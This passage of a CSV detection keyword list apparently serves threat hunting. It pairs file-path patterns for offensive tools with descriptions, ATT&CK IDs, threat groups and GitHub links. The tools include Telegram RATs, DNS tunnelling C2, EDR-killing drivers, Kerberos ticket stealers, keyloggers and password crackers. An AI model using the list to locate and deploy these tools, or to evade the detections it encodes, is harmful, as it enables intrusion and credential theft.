TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - 
TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/TelegramRAT.git*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*/telnet_cdata_ftth_backdoor_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/telnet-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/telnet-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/telnet-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/terminate/Terminator.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*/test32.dll*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/test64.dll*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/tests/NIST_CAVS/*.rsp*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/tests/test-bof.ps1*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/tevora-threat/PowerView*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*/tftp-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/TGSThief.git*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*/TGSThief/*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*/tgtParse.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/tgtParse/tgtParse.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/thc-hydra/*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z 
-*/the-backdoor-factory.git*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/TheFatRat*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/theHarvester.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/theHarvester.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/ThemeBleed.exe*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*/thief.py*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - 
TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*/thirdparty/msf/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/ThisIsNotRat.git*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*/thoth.git*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/ThreadlessInject.git*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*/ThreatCheck.git*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*/ThunderDNS*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*/ticketConverter.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does 
not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/ticketer.py -*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*/ticketer.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/ticketsplease.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential 
Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/TikiLoader/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/TikiSpawn.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. 
and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/TikiSpawn/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/timeoutpwn64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/timestomp.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/timestomping.ps1*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/timwr/CVE-2016-5195*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*/tinar.py*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,0,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*/tls-alpn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tls-nextprotoneg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tls-ticketbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tmmmp *,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/tmp/*-passwords.txt*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,0,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/tmp/*-usernames.txt*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,0,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/tmp/.manspider*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
